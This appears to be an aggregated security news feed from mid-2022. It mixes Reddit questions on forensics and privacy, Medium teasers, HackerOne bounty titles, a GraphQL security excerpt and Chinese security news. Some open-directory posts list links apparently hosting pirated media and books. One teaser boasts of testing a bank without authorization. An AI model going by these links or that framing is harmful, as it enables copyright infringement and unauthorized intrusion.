    I was browsing regarding vpns and a website said this, "Even when you are using a VPN it is possible to find out who you are by looking at your Hostname, Computer name or MAC address by those on the web or local network. If you're for example using torrents it is possible to see your Computer ID. If someone really wants to find out who you are, they can by creating a simple algorithm to track your Computer ID patterns in torrent networks. Same method can be applied to all types of networks." Is this true or just a scare tactic ? submitted by /u/zilla005 [link] [comments]
    SANS MSISE - employment waiver
    Personal background: Active duty Navy aviation electronics technician. Four years remaining on my contract. Currently on track to finish a B.S. in cybersecurity in Spring 2023. I've started looking into graduate programs, namely at my current institution but also the SANS Information Security Engineering program. I've heard varying opinions on the ROI of a master's degree, but between my Navy tuition assistance and GI Bill, I could have the program funded. Not to mention the certifications that the program would lead to. All that said, I'm wondering if anyone has experience with getting the graduate admissions employment requirement waived. As an aviation electronics technician I work with computers and classified material; mostly aircraft systems, classified computer systems, COMSEC, etc. With that in mind, I'm not certain I would be able to apply all the concepts directly. Would mentioning a home lab setup bolster my chances? submitted by /u/SlipshodRaven [link] [comments]
  • Open

    GSuite domain takeover through delegation
    No content preview
  • Open

    GraphQL Security
    🔍 Introduction GraphQL is a query language intended to let a browser fetch data from a server efficiently; it emerged to solve problems with existing REST APIs. Where a REST API returns data according to a spec defined by the server, GraphQL lets the client fetch the data it wants in a format the client itself defines. Where services built on REST APIs and SQL do their querying and processing on the backend, GraphQL services do a larger share of querying and processing on the frontend. A GraphQL HTTP request is therefore split into a Schema, which defines the structure, and the actual queries, the Query and Mutation parts. Together these are called GQL. Schema type Query { polygon (sides: Int, regular: Boolean): Polygon } type Polygon { perimeter: Float area: Float } Query & Mutation query { polygon(sides: 1, regular: true) { perimeter area } } mutation { createPerson(input: { ... }) { person { id name } } updatePerson(input: { ... }) { person { id name } } } 🗡 Offensive techniques How to test Services that use GraphQL usually carry a body of their own rather than the commonly seen form- or JSON-based bodies. They usually use a path such as /graphql, and even when the path differs, a request that contains a query is treated as a GraphQL service. Testing points As explained above, a GraphQL backend only processes data according to the GQL it receives; composing the query is the frontend's job. That means much of the logic that used to be hidden in the backend moves to the frontend, which in turn means the number of points we can test has grown...
    ZAP⚡️ Replacer VS Sender Script
    How do you add a new header or new data to every request in ZAP? Usually you can change or add values with the Replacer feature. Burp Suite does the same thing with its Match and Replace feature. ZAP Scripting, however, also has the Sender script, which can control every request as it is made, and with it you can implement the same behaviour in a script. Today we look at the differences and characteristics of these two approaches. Replacer As the name says, it replaces values. You usually open it with the shortcut Cmd + R or via Options > Replacer, choose the match type and string and the replacement string, and the rule is then applied to every request/response that is sent (Proxy, Manual Request, Scan, etc.). Request and Response rules are specified separately and have the following types: Request Request Header (will add if not present) Request Header String Request Body String Response Response Header (will add if not present) Response Header String Response Body String Sender Script A Sender script is one of the ZAP script types; it runs the logic written in its event handlers before a request is sent and after a response is received. You can find it under Scripts > HTTP Sender. Depending on what you write, you can build many features, handled through sendingRequest() and responseReceived(). Since this is scripting, it naturally supports several languages such as JS, Python and Ruby. Add header request (.py) headers = dict({"X-NEW-HEADER": "XXXXXxXX-xxXX-XXXx-xxxX-XXxxXxXXxXxX", "Cookie": "aaa=1234"});...
  • Open

    Key Points of Vietnam's Data Compliance Rules
    Vietnam's emphasis on the digital economy is evident, and data compliance, as the core compliance requirement of the digital economy, deserves the attention of every company expanding into Vietnam.
  • Open

    Officer_CIA: Retrospective
    Here is a retrospective of my best articles! You can also track my work entirely at my start.me (always use mullvad.net when visiting it)… Continue reading on Medium »
  • Open

    Treebox - Python AST sandbox challenge from Google CTF 2022
    While writing an article on how "Hello World" actually works in Python (written with j00ru and Adam Sawicki, and published in the 100th issue of the Polish Programista magazine; we'll publish the English translation on our blogs around September/October 2022) I've played a bit with Python's ast module (as in Abstract Syntax Tree) and decided it would make a cool CTF challenge if I made some restrictions on the AST level and had folks try to bypass them. This wasn't of course the first challenge using the AST on a CTF, though I did think to check only after I had already implemented it. Thankfully other challenges use different restrictions, so there were no collisions. Here are some of them though (leave a comment in case I've missed some): pysandbox @ TokyoWesterns CTF 4th 2018 (example…

  • Open

    Persistence Using Windows Terminal “Profiles”
    Profiles All The Way Down Continue reading on Medium »
  • Open

    Possible to make restricted files public on Phabricator via Diffusion
    Phabricator disclosed a bug submitted by dyls: https://hackerone.com/reports/1560717 - Bounty: $2000
    Send Fax from Anyone's HelloFax Account Due to Misconfigured Email Validation
    Dropbox disclosed a bug submitted by sayaanalam: https://hackerone.com/reports/1428385 - Bounty: $4913
    @nextcloud/logger NPM package brings vulnerable ansi-regex version
    Nextcloud disclosed a bug submitted by ro0telqayser: https://hackerone.com/reports/1607601
  • Open

    IDOR on the NFT Marketplace naksh.org
    Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied… Continue reading on Medium »
    Business Logic Vulnerabilities == $$$
    According to OWASP , Business Logic Vulnerabilities are ways of using the legitimate processing flow of an application in a way that… Continue reading on Medium »
    5 easy ways to detect the clickjacking vulnerability
    Hello everyone, I am Vignesh, a 20-year-old Security Researcher from TamilNadu, India. Continue reading on Medium »
    How this team accidentally found a SSRF in Slack exposing AWS credentials! A $4000 bug bounty
    Complex libraries lead to hidden attack vectors Continue reading on InfoSec Write-ups »
    EAZI FINANCE TESTNET QUICK GUIDE
    ABOUT EAZI FINANCE Continue reading on Medium »
    ASN — Autonomous System Networks
    some` some` Continue reading on Medium »
    Hakrawler — information gathering tool for bug bounty hunters
    In this tutorial, I just want to talk about another hacking tool developed for penetration testers and especially bug bounty hunters. Continue reading on Medium »
    Hacking the photographer
    Hi guys! Guess who's back…back again! This blog will be great; I could teach you a lot of things, this time showing you how I rooted the… Continue reading on Medium »
    Networking Fundamentals — for Ethical Hacking & Bug Hunting (day-3)
    Hello guys, it's Selim back here with another interesting article. In the previous article, we learned about how and why a beginner should… Continue reading on Medium »
    Appointment Starting Point HackTheBox Writeup.
    Appointment is a very good lab to practice database-related security issues. So in this writeup [walkthrough] we are going to exploit… Continue reading on Medium »
  • Open

    google home page
    Hello, I don't know if it is normal or not? But instead of being google.com, my Google home page looks like this: google.com/webhp?client=ms etc Is this normal or not? submitted by /u/nintenboye [link] [comments]
    Autoupdate Weak Passwords
    Is there a service that will allow me to import all of my usernames and passwords, then simply click a button and it will go and automatically strengthen all of my weak passwords on each of the sites where my security is lacking? submitted by /u/thats_taken_also [link] [comments]
    Bruteforce admin account on DC from unknown device
    In the DC logs, I found that there were 5,000+ failed logon attempts from an unknown device (that is definitely not part of us) to one of our admin accounts. How would you start an investigation? What I did: I checked the VPN logs. Maybe someone logged in to our corporate network via VPN, but nothing was found. I also have a hypothesis that maybe the attacker is not connected to the internal network; there are some external services that use AD creds for authentication. So the attack was from external to internal. But I don't know how to check this. submitted by /u/athanielx [link] [comments]
    How does an app like “Flightradar24” know that I have gotten to an airport/a location.
    When I arrive at an airport I get a notification from the Flightradar app on my iPhone that welcomes me to the airport (here's a screenshot: https://postimg.cc/n91HvFS9). I just don't understand how the app knows that, even though it is running in the background and has only "while using" turned on in the location settings. Of course my #1 worry is privacy: does that mean it is constantly grabbing my location just to display that notification once in a while when I go to the airport? And #2, how does this impact battery life? If the app can discreetly get my location in the background, can other apps do this? And how would I turn that off? I really don't need Facebook or TikTok knowing where I am. (If the answer is obvious don't absolutely roast me please lol) submitted by /u/SmallIce4 [link] [comments]
    Password manager for life
    Hi, I am currently looking to get a password manager to install on my computer that I'd keep for countless years. I don't mind paying a price (small per month) or big upfront. But I have a question about services like Bitwarden with a monthly subscription. If the company fails or something along those lines, how would the system still work? I prefer an upfront payment anyway, but the monthly payment for things such as these has always been bugging me. Looking forward to your answers! submitted by /u/Simon__Puech [link] [comments]
    Information Security Compliance Jobs
    Hello, I didn't know where to post this so I'm asking here as this subreddit seemed relevant. I'm an IS and IT compliance professional in Pakistan and have been working in the domain for the past six years, mainly at consulting firms (Deloitte and KPMG) in Pakistan. I've recently switched to an insurance company in my country as an Information Security Manager, but our country has been doing really badly economically, which is the reason I've been looking into remote jobs that could potentially pay in USD or any other foreign currency. I always planned on moving abroad to pursue a career, but that isn't possible right now because of my family, which is why I'm inquiring about where I can find remote jobs in the domain. PS sorry if I made mistakes typing this as I'm on my phone and English isn't my first language. submitted by /u/ads496 [link] [comments]
  • Open

    I'm Building a Self-Destructing USB Drive.
    submitted by /u/Machinehum [link] [comments]
    Critical Vulnerability Affecting Arris / Arris-variant DSL/Fiber Routers
    submitted by /u/sanitybit [link] [comments]
    ImHex - A Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM
    submitted by /u/CyberMasterV [link] [comments]
    Manipulating Windows Tokens with Go
    submitted by /u/sciencestudent99 [link] [comments]
    Disclosing information with a side-channel in Django
    submitted by /u/albinowax [link] [comments]
  • Open

    South Park episodes in Fullscreen (4:3)
    SP 4:3 In this folder are the first 11 and 1/2 seasons of South Park in 4:3 Fullscreen before they were rerendered in 16:9 widescreen. The second half of season 12 is not included, as those episodes were actually originally produced in widescreen, but cropped into fullscreen for early TV airings and DVD releases. As of now, episodes are still being added, so if you notice that a season or episode is not included, don't worry, it'll all be there within the next couple of days. I don't have all of seasons 9 and 10 yet, so they may take an extra day or so. Edit: From the looks of it, I won’t be able to get season 10. If I find them, this post will be updated. submitted by /u/ImagineDraggin9 [link] [comments]
  • Open

    OSINT Tool — Emporis
    I heard about the website Emporis.com while on holiday reading the book “A Burglars Guide to the City” by Geoff Manaugh. I just want to… Continue reading on Medium »
    War in Ukraine / July 28
    Day 156: The tragedy in Olenivka Continue reading on Medium »
    Leaks: find and stop
    I was prompted to this topic by numerous publications of leaks of confidential information from internal databases of state bodies, which… Continue reading on Medium »
  • Open

    SecWiki News 2022-07-29 Review
    EMBA - The firmware security analyzer by ourren VulnLab: Web Application Vulnerabilities Lab by ourren Vajra - Your Weapon To Cloud by ourren APT trends report Q2 2022 by ourren [HTB] October Writeup by 0x584a For more recent articles, visit SecWiki
  • Open

    Clean definition of physical vs. logical data extraction?
    Hi there, it seems to me that it's not that easy to very precisely define the difference between physical and logical data extraction. I tried something like: "physical data extraction means copying the data bitwise from the source, whereas logical extraction involves some kind of interpretation of the data with some software." But it doesn't feel like that's all. Do you see my problem? submitted by /u/Knuust [link] [comments]
    Encase won't open HFS+ Hard Drive
    Hi everyone, we have got two very similar hard drives with nearly the same problem. The hard drives are external USB disks, both with an HFS+ case-sensitive, non-journaled filesystem. When we try to open them in Encase 21 or 22 we get the error message "string or blob too long". We are currently trying to figure out if any of the files or folders are corrupt by exporting them with GetData Forensic Explorer, because this tool can open the hard drives but has problems exporting all of the files. Has anyone had this error message in Encase and can tell me where or what the problem is? submitted by /u/Ready_Note6642 [link] [comments]
    What weapons of choice are in your forensics workstation software repertoire? Post your builds!
    I've just upgraded my workstation and bought an absolute beast of a laptop. I've begun the process of listing all my programs, apps, software, keys and tools and other useful bits and pieces that I have gathered over time on my main workstation PC, and I am using the opportunity of a fresh new rebuild on the upgraded workstation and the beast of a laptop to tidy everything up and really streamline the whole setup with the new hardware. My programs and apps are mostly geared towards mobile forensics, and are as follows: iPhone Backup Extractor Oxygen Forensic Detective Oxygen Data Extraction Wizard Oxygen Forensic Call Data Expert Oxygen Forensic Cloud Extractor Axiom Process Axiom Examine Autopsy (+ modules) iPhone Backup Extractor iMazing RazorSQL Sqlite DB Browser SQL Database Recovery Sqlite Forensic Explorer DCode Timestamp Converter FTK Forensic Toolkit Notepad++ HEX Editor (various programs) DrFone (Android and iOS) Stella Data Recovery Stella iPhone Recovery Stella OST Converter VLC Media Player + Codec Packs Most of the Nirsoft tools (some nifty little things there!) .... Can anyone think of anything super useful that I haven't got? Mostly mobile forensics related stuff as you can see, that's my main area of interest - but there's a few broad covers there too ;) What do you consider the essential tools, programs and software that you have on your workstation? submitted by /u/dothepropellor [link] [comments]
  • Open

    Threat Hunting Techniques, Tactics and Methodologies
    submitted by /u/Successful_Mix_8988 [link] [comments]
    Red Team Field Manual V2 by Ben Clark and Nick Downer has been released
    submitted by /u/ulriken_ [link] [comments]
  • Open

    IW Weekly #12: $O to $150,000/month mindset, Zoom RCE, Abusing FB Features, Bypass CSRF Protection…
    No content preview
    How this team accidentally found a SSRF in Slack exposing AWS credentials! A $4000 bug bounty
    No content preview
  • Open

    FreeBuf Morning Report | US court system suffers a major attack; senior Ukrainian cyber official comments on the Russia-Ukraine cyber war
    The US court system suffered a major attack, putting sealed documents at risk; a nuclear safety system in Spain was hacked, disrupting services in some regions for months.
    FreeBuf Weekly | 51 apps reported by the Shanghai Communications Administration; big-data price discrimination to face severe punishment; US and UK reach a data access agreement; Web3 economic losses hit a record high
    Happy weekend, Buffers; here is this week's "FreeBuf Weekly".
    Domino Server SSL Certificate Installation Guide
    Domino server SSL certificate installation guide.
    Security risks of enterprise outsourcing and how to respond | FreeBuf customer-side group discussion
    In security, outsourcing often becomes the weakest link. What security risks does an outsourced team bring to an enterprise, and how should we deal with the problems outsourcing introduces?
    US expected to expand its cybersecurity partnership with Ukraine
    The US government's cybersecurity agency has signed an agreement with its Ukrainian counterpart to strengthen cooperation on cybersecurity.
    Jinan University Institute of Information Technology recruitment plan for cybersecurity technical staff
    Jinan University's Institute of Information Technology is recruiting a cybersecurity services project manager, network technical support engineers, cybersecurity engineers (offensive/defensive track), and more
    Microsoft says it found an Austrian spyware group using Windows and Adobe 0-days to attack European organizations
    Microsoft's security and threat intelligence teams say they discovered an Austrian company selling the spyware DSIRF, developed on the basis of unknown Windows vulnerabilities.
    Google's plan to disable third-party cookies is delayed again
    Google said on Wednesday that it is once again postponing its plan to disable third-party cookies in the Chrome web browser.
    More and more victims refuse to pay ransoms to hackers
    The proportion of victims paying ransoms to hackers and the ransom amounts are both declining, a trend that has continued since Q4 2021.
    Microsoft SQL servers hacked, bandwidth hijacked
    Attackers compromise Microsoft SQL servers using ad-bundled software or even malware, turning the devices into servers rented out as online proxy services for profit.

  • Open

    Domain Enumeration Methodology
    Hey folks, today I start a new series of articles discussing Active Directory Exploitation. In this first article, we focus on domain… Continue reading on Medium »
    Sticky Notes is it safe?
    What if i told you it’s better to forget your password than write it down into a sticky note. Continue reading on Medium »
    Linux privilege escalation by abusing sudo
    In Linux, sudo stands for “super user do”. Whenever you execute a command in Linux and prefix it with sudo, it is executed with root… Continue reading on Medium »
  • Open

    HTML Injection via TikTok Ads Email Share
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1376990 - Bounty: $1000
    Twitter Account hijack through broken link in https://runpanther.io
    Panther Labs disclosed a bug submitted by prakash142: https://hackerone.com/reports/1607429 - Bounty: $100
    Hijack all emails sent to any domain that uses Cloudflare Email Forwarding
    Cloudflare Public Bug Bounty disclosed a bug submitted by albertspedersen: https://hackerone.com/reports/1419341 - Bounty: $6000
    Acronis True Image Local Privilege Escalation Due To Race Condition In Application Verification
    Acronis disclosed a bug submitted by vkas-afk: https://hackerone.com/reports/1251464 - Bounty: $250
    Off-by-slash vulnerability in nodejs.org and iojs.org
    Internet Bug Bounty disclosed a bug submitted by nagaro: https://hackerone.com/reports/1650273 - Bounty: $1200
  • Open

    nanopb Protobuf Decompiler - Anvil Secure
    submitted by /u/anvilventures [link] [comments]
    Building AppSec Pipeline for Continuous Visibility
    submitted by /u/nicksthehacker_ [link] [comments]
    Extracting Ghidra Decompiler Output with Python
    submitted by /u/dinobyt3s [link] [comments]
    Railway cybersecurity in the era of interconnected systems
    submitted by /u/sanitybit [link] [comments]
    Vulnerable by Design: Azure Red Team Attack and Detect Workshop
    submitted by /u/sanitybit [link] [comments]
    Abusing Duo Authentication Misconfigurations in Windows and Active Directory Environments
    submitted by /u/sanitybit [link] [comments]
    Spear Phishing on Modern Platforms
    submitted by /u/sanitybit [link] [comments]
    Passkeys: a push to take WebAuthn to the masses
    submitted by /u/sanitybit [link] [comments]
    Scraping Login Credentials With XSS
    submitted by /u/sanitybit [link] [comments]
  • Open

    Reading Message from Microsoft’s Private Yammer Group
    Hi All, Continue reading on Medium »
    Weak Session IDs (Low - Security) | DVWA Writeup
    Session hijacking is a good place to start career in bug bounty. This walkthrough will assist you in mastering a knowledge and skills. Continue reading on Medium »
    XSS in Open Redirect which uses attribute rel=”noopener follow” target=”_blank Via Browser Modern
    Hi everyone Continue reading on Medium »
    IW Weekly #12: $O to $150,000/month mindset, Zoom RCE, Abusing FB Features, Bypass CSRF Protection…
    Hey 👋 Continue reading on Medium »
    How I became a millionaire in 3h | Fintech Bug Bounty — Part 1
    Lately, I’ve been doing some pentesting on a bank. It’s not like they hired me, but I felt curious about their infrastructure and asked… Continue reading on Medium »
    Why this SIMPLE mistake earned a $5000 bug bounty from Reddit
    Moral of the story — be careful when you refactor code Continue reading on InfoSec Write-ups »
    Bug Write-up on the UIN Maulana Malik Ibrahim Application
    This time I will share my experience of a bug I found in the application of UIN Maulana Malik Ibrahim Malang. Continue reading on Medium »
    GALAXYBLITZ BETA CAMPAIGN $100,000 TO BE SHARED
    Galaxy Blitz is a Play To Earn strategy NFT game where you lead the descendants of humanity to forge a new empire. Continue reading on Medium »
  • Open

    Nothing new or spectacular just having some fun. Golang redteaming.
    submitted by /u/allbetsroffnow [link] [comments]
  • Open

    dotnetfile Open Source Python Library: Parsing .NET PE Files Has Never Been Easier
    The dotnetfile library extracts useful information from .NET PE files and can overcome common techniques malware authors use to break parsing. The post dotnetfile Open Source Python Library: Parsing .NET PE Files Has Never Been Easier appeared first on Unit 42.
  • Open

    Windows and Linux Authentication Bypass with new version of AIM (+ virtual DD)
    submitted by /u/DFIRScience [link] [comments]
    How long does it take cellebrite to get back with a quote?
    I am doing a lab refresh and have contacted Cellebrite for a quote. I had a call with them, then never heard back. It has been over a week. Is this normal? Also, if you were doing a lab refresh, what would be your dream setup? submitted by /u/MDCDF [link] [comments]
    SANS FOR585 index?
    Does anyone have a SANS FOR585 index that I could see? I'm curious whether mine is adequate. submitted by /u/tankton [link] [comments]
    Android 12 / Verizon / sms recovery
    Corporate investigation, not criminal. Sent the phone away; the forensic company sent it back saying they couldn't do anything with it. So I said I might as well take a stab at it. Using MobilEdit for recovery since I know very little about Android. Pulled a logical dump of the phone, got everything off the phone, but nothing shows up in its deleted data scan. Took a Samsung Smart Switch backup to PC, saved for later. Perused the xda forums, found that the phone's bootloader is not unlockable, so no root access for me. Thanks Verizon. Booted to Tsurugi, used android triage, but nothing helpful there. Saw that MobilEdit can import a Smart Switch backup, tried to import the one I took earlier, but it can't read it; it can only read backups to SD card. Ok then, went and got a microSD card and USB-C connector, attached it…an…
    Trying to recover Messenger Conversation
    I already tried downloading Personal Data multiple times. It's not there. The chats were 3 weeks ago at most. Any tips? submitted by /u/SaqMadique [link] [comments]
  • Open

    Currently working workers.dev sites
    https://xp3.xev.workers.dev https://drive.spidercloud.workers.dev/1:/ https://cloud.eleventh-hour.workers.dev/0:/ https://www.savage69.workers.dev/0:/ https://otmbd01.sasohan.workers.dev https://td.lightdrive.workers.dev/1:/ https://mydrive.rahul112kapoor.workers.dev/0:/ https://netflixcrew.rahulinstinct.workers.dev/0:/ https://punishermirror.punisher876.workers.dev/0:// https://animated0.archives.workers.dev/ https://ps4.td-index.workers.dev/0:/ https://sparkling-sea-1d6d.bakingsoda.workers.dev (The first one is mine) Pastebin submitted by /u/ilikemacsalot [link] [comments]
    D&D Books
    http://www.dnd.etherealspheres.com/eBooks/ A couple NSFW books submitted by /u/c-rn [link] [comments]
  • Open

    Looking for someone to do vulnerability research and develop exploits together.
    Greetings my fellow exploit developers, I hope you are doing well. As the post title says, I am looking for someone to do some real world vulnerability research with and develop some exploits when we find something. I am having problems with keeping myself motivated when I am not finding anything, which leads to me dropping the project and doing something else which is usually unrelated to exploit dev and vulnerability research. I hope to find someone or a small group of people who are having similar problems, so that we can keep each other motivated by talking to each other every day, sharing each other's findings and learning something new together. This is my thought process and the reason why I am making this post. So if there is anyone out there who thinks something like this can help us, please feel free to reach out to me in DM, Chat or Comments :) Thanks. submitted by /u/CJtheDev [link] [comments]
  • Open

    War in Ukraine / July 27
    Day 155: Above 40 hryvnias per dollar Continue reading on Medium »
  • Open

    Multiple Successful log ins from Internet explorer on my Microsoft account
    Okay so yesterday I went and checked my login activity since I haven't checked in about a week, and when I looked I noticed that there was a successful login five days ago from Internet Explorer. As well, when you expand it to see more info on it, I saw that it had multiple times asked for additional verification. Strangely it was all from my own IP address. I have 2FA active, so if anyone even tried to log into my account I would need to approve it first, so I have no idea how Internet Explorer signed into my account successfully, even asking for additional information. As well, I checked again this morning and there were two more times IE successfully logged in. I have scanned my computer and nothing came up; as well, I have already changed my password for my account. submitted by /u/Alphem_384 [link] [comments]
    Pentesting
    I need advice on an effective tool for pen testing apps hosted on AWS. submitted by /u/dazkaly [link] [comments]
  • Open

    SecWiki News 2022-07-28 Review
    A large-scale internal lateral-movement engagement in an authorized non-domain environment by 路人甲 FIRST 2022 talks digest by Avenger For more recent articles, visit SecWiki
  • Open

    FreeBuf Morning Report | Spain arrests hackers who sabotaged a radiation alert system; data breach costs hit a record high
    Data breach costs hit a record high.
    Looking at the Didi penalty from a permissions perspective
    Take a look at the permissions named in the Didi penalty decision for illegally collecting users' personal information, and do a permissions self-check on the apps you use every day~
    A record number of attacks | Reading the Web3 Security Quarterly Report
    CertiK recently published the Web3 Security Quarterly Report (Q2 2022 edition), which describes the state of Web3 cybersecurity.
    No escape even after leaving: Uber assists the DOJ in prosecuting its former CSO
    Uber reached a non-prosecution agreement with the US Department of Justice over a 2016 hacking incident; the price is that Uber agreed to help the DOJ prosecute its former Chief Security Officer, Sullivan.
    Analysis | The situation in Eastern Europe is shaping the global DDoS attack landscape
    Research finds that DDoS attacks have been actively used for political purposes.
    IBM data breach cost report released; data breach costs hit a record high
    IBM has released its latest Cost of a Data Breach report.
    New phishing platform Robin Banks appears, targeting well-known financial organizations in multiple countries
    A new phishing-as-a-service platform has recently appeared, offering ready-made phishing kits that target customers of well-known banks and online services.
  • Open

    Why this SIMPLE mistake earned a $5000 bug bounty from Reddit
    No content preview
    How to Install Elastic Stack on Ubuntu 22.04 LTS
    No content preview

  • Open

    Threat Brief: Microsoft Critical Vulnerabilities (CVE-2022-26809, CVE-2022-26923, CVE-2022-26925)
    We provide an overview of CVE-2022-26809, CVE-2022-26923 and CVE-2022-26925, along with recommendations for mitigation. The post Threat Brief: Microsoft Critical Vulnerabilities (CVE-2022-26809, CVE-2022-26923, CVE-2022-26925) appeared first on Unit 42.
  • Open

    AWS Security(S3 buckets, ec2 snapshots, leaked aws keys)
    flaws.cloud challenge Continue reading on Medium »
    HackTheBox | Jerry | Write-up
    Hey Guys, Continue reading on Medium »
    GSuite domain takeover through delegation
    Continue reading on InfoSec Write-ups »
    GSuite domain takeover through delegation
    Continue reading on Medium »
  • Open

    10TB+ of Movies/TVShows, fast connection, couple of NSFW movies.
    submitted by /u/Pukit [link] [comments]
    Daft Club Directory (not fully archived but most links still work)
    submitted by /u/sastofficiallol [link] [comments]
    brewing and distillation guides
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Axiom pictures
    Looking at an image in Axiom. There are 97,000 images; 95,000 are Windows system or program default pictures. I'm looking for a single picture of contraband. Is there a way to prevent the stock Windows images from showing up? I'm looking for a setting to prevent seeing all the stock pics. Thanks in advance. submitted by /u/TxProud [link] [comments]
    Incident response and forensic practitioner survey
    I am looking for people with incident response and/or forensics experience to contribute towards an industry survey, designed to help identify ways of optimising service delivery and identify common issues facing IR teams. If you work in an incident response team at any level (junior, senior, or director) and/or conduct forensics following system compromises, please consider responding to my survey. It will only take 5 - 10 minutes, and your support would be greatly appreciated: https://forms.office.com/r/5NtbWAhNWe This is an anonymous survey, but there is the option to leave your email address so that you can stay informed about the results. If you'd prefer not to have your email linked to your submission, please DM me instead. submitted by /u/QoTSankgreall [link] [comments]
    How many drivers are loaded in memory at any given time (rough estimate)?
    I understand that circumstances vary, but what is your rough estimate? Consider a normal user workstation. Thanks, DBR submitted by /u/DeadBirdRugby [link] [comments]
    Software piracy investigation
    Can someone let me know how to forensically identify installation of pirated software? What are the artifacts we should look for? submitted by /u/Pepperknowsitall [link] [comments]
    Are professional organizations worth it?
    Hi, I am wondering if joining a professional organization is worth it. If it is, what are some you recommend for computer forensics and computer engineering (this will be crossposted to both subs)? submitted by /u/swatteam23 [link] [comments]
    ZIP file corrupt/not right format
    I'm currently undergoing a university assignment that requires analysis of an image file and finding evidence to prove illegal activity. I've come across a ZIP file, but when extracting it and inspecting it I was met with an error "corrupt/not right format". I know this file has something important but it doesn't seem to have a standard encryption on it. Are there any methods of inspecting this file further to see if it contains any data or is being masked as a ZIP? (FTK Imager wouldn't open it, nor WinRAR) submitted by /u/fgtethancx [link] [comments]
  • Open

    AlienVault OSSIM logging?
    So I have OSSIM (but not USM) on a VM and was wondering: the official site says that OSSIM doesn't have log management, but does that mean that it's simply unable to, say, forward logs to a syslog server? Does OSSIM store logs? If so, how can I see how much storage those logs are taking up, and if not, how does OSSIM store its data then? submitted by /u/QueenofCodeNow
    Help needed: plan of action to grow my tool set in regards to forensics and security
    TL;DR: I'm looking to make a plan of action to gain core knowledge on scripting and operating systems within the context of security. I'm curious to hear your thoughts on what such a plan could look like and what home projects/education platforms could help achieve this. Hi all, I recently applied for a forensics job, but failed the assessment (which was expected). I'm CompTIA Net+ & Sec+ certified, but run into problems when I need to do hands-on work. It should be noted the job was a medior/senior function, but I decided to give it a shot anyway for the learning experience, which made it extremely valuable. Things I ran into in this particular assignment: basic OS functionality on Windows & Linux: what are the interesting places to start your research and how to securely assess them (processes, bash history, etc.); bash scripting; Python scripting. I've done plenty of Hack The Box, but feel that the guided learning method keeps me from retaining the information. I might have the option to do a funded 10-week full-time full-stack development course, but that might be overkill and out of scope. I also have a home server which allows me to experiment; I'm just not sure for now how to utilize it to full effect, besides securing the network as well as possible. Thank you for taking the time to read, and for any advice you might have. submitted by /u/-Column-
    Simple site Security audit - NoSQL injection, buffer overflow...
    Hi! I'm new to security auditing and I have to do it. In college we got a task to do about pen-testing a site built with Node.js, Express.js, Pug and MongoDB. This is a simple "kitchen blog"; you can post your recipes there. (Anticipating the questions: ethical hacking is not my job, not my field of study. The only thing I want is help, not for anyone to do it for me!) I have already done things like: password confirmation on the register page is wrong, you can set a different second password. There is no data encryption between us and the server; the password is visible (login and registration). Permissions issue: a normal user can delete another user's account. NoSQL injection, a few different ways (I don't know if I did it right). User info update issue and small stuff about validating the inserted data. So after good research I do not know if I did the NoSQL injection right (NoSQL is not common to test, I think). Maybe I need confirmation that I did this right. Things I need to test: buffer overflow, NoSQL injection, canonical form. Are there any tips, videos, articles that you can recommend for that? I have been watching and reading a lot of stuff. Of course I'm doing research and I'm fighting with this another day... I think this is an unusual post that will make you smile and help :D submitted by /u/puperinoo
    Vulnerability analysis and information disclosure
    Hello folks, I was tasked to perform vulnerability analysis inside the corporate network and find any useful/disclosed information (publicly available IPs, shared printers/folders, files with passwords, routers with a default password, open ports, internet-exposed services/admin panels, etc.): any information that I could find as a threat actor inside the target network. I had never done this before; this is my first task of this type. Mostly I work on SOC analyst stuff (phishing investigation, traffic monitoring, etc.). Could you please suggest any guides/articles/tools/checklists/books for achieving this goal and performing this analysis? I need to create a report with all findings. submitted by /u/TRYH0

    Creating Sock Puppet Accounts: Everything You Need To Know — Part 3.1
    Hey Folks! I hope you liked part 2 of my OSINT series. Continue reading on Medium »
    War in Ukraine / July 26
    Day 154: The number one goal is the Antonovsky bridge Continue reading on Medium »

    Corrupting memory without memory corruption
    submitted by /u/surrealisticpillow12
    Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits
    submitted by /u/surrealisticpillow12
    Sternum Announces Free Security and Observability Platforms for OpenWrt IoT Devices
    submitted by /u/mesok8
    For 12 Hours, Was Part of Apple Engineering's Network Hijacked by Russia's Rostelecom?
    submitted by /u/danyork
    Inside Matanbuchus: A Quirky Loader
    submitted by /u/jat0369

    MSA Weekly 5 — “How to Get Sensitive Data Exposure on Web Application”
    Hello Readers, Continue reading on Medium »
    TryHackMe RootMe Machine Solution
    Phases: Continue reading on Medium »
    GSuite domain takeover through delegation
    Continue reading on Medium »
    MSA Weekly 5 [How to Get Sensitive Data Exposure on Web Application ]
    Data Sensitive Exposure Continue reading on Medium »
    Approaching a Wordpress Site for Bugs :)
    Hi Geeks, This is Aravind here with another blog which may help you in finding bugs on Wordpress sites easily. I have also attached few of… Continue reading on Medium »
    How a Race Condition made these crypto hackers $5000 bug bounty
    Moral of the story — test concurrent requests Continue reading on InfoSec Write-ups »
    ALLIANCEBLOCK TESTNET BUG BOUNTY QUICK GUIDE
    About AllianceBlock Continue reading on Medium »

    SecWiki News 2022-07-27 Review
    DeepJIT: an end-to-end deep learning framework for just-in-time defect prediction by ourren; Just-in-time defect prediction based on AST change embeddings by ourren; For more of the latest articles, visit SecWiki

    Microsoft again reverses course, will block macros by default
    submitted by /u/ulriken_

    Catch from HackTheBox — Detailed Walkthrough
    No content preview
    How a Race Condition made these crypto hackers $5000 bug bounty
    No content preview

    FreeBuf Morning Report | Uber settles hacking case with the US Department of Justice; Port of Los Angeles hit by 40 million attacks a month
    Uber has reached a settlement with the US Department of Justice over its cover-up of the November 2016 data breach and agreed to the prosecution of its former chief security officer Joseph Sullivan.
    All about stack pivoting
    This article aims to walk readers step by step through the principles of stack pivoting and its application in CTFs, using principles plus worked example problems.
    Hackers complete vulnerability scans within 15 minutes of a vulnerability disclosure
    A research report shows that attackers scan for vulnerable endpoints within 15 minutes of a new CVE being publicly disclosed.
    Malicious apps listed on the Google Play store downloaded over 10 million times
    The anti-virus team at Dr. Web found a batch of Android applications in the Google Play Store stuffed with adware and malware.
    US university releases major report exposing the government's ongoing surveillance of the public
